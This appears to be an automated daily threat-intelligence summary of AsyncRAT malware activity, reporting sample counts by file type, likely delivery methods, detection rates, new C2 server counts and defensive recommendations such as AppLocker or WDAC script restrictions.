Daily Summary
AsyncRAT activity surged sharply with 48 new samples, rising 145% above the 7-day average of 20. This spike marks one of the largest single-day increases in recent weeks, driven primarily by an uptick in executable-based payloads.
New Samples Detected
Executables (.exe) dominate with 27 samples, accounting for over half of today’s total. PowerShell scripts (.ps1) remain a significant secondary vector with 9 samples, while batch files (.bat), compressed archives (.zip, .rar), JavaScript (.js), and a lone screen saver (.scr) round out the distribution. The presence of a .scr file suggests continued experimentation with alternative execution mechanisms to evade static analysis.
Distribution Methods
File type diversity indicates a multi-vector approach. The high count of .exe and .ps1 files points to email attachments and script-based delivery, likely through phishing campaigns or drive-by downloads. The inclusion of .zip and .rar archives suggests bundling with malware-as-a-service toolkits, while the .js and .scr entries hint at social engineering via fake executable icons or remote scripting.
Detection Rate
Current AV engine catch rates remain moderate. The use of obfuscated .ps1 and .js files, along with .bat wrappers, suggests some variants are bypassing signature-based detection. The single .rar sample may be packed, further reducing heuristic detection efficacy. Reputation-based systems may be slower to flag newer C2 domains.
C2 Infrastructure
100 new C2 servers were identified today, a substantial addition indicating active infrastructure rotation. While geographic distribution data is unavailable, the high volume of new servers suggests rapid provisioning to avoid blocklisting. Analysts should monitor for consistent beaconing patterns across these IPs.
7-Day Trend
Today’s 145% surge above the 7-day average breaks a two-week pattern of relatively stable volume, signaling a campaign escalation rather than a one-off event.
Security Analysis
The spike in .ps1 usage (9 samples) alongside .exe files is noteworthy. AsyncRAT operators are increasingly blending script-based loaders with compiled payloads, likely to evade application whitelisting policies. Additionally, the first .scr appearance in this week’s data suggests a shift toward exploiting file extension trust in Windows environments. Defensive recommendation: Enforce script execution restrictions via AppLocker or WDAC, and treat .scr attachments with the same scrutiny as .exe files in email gateways.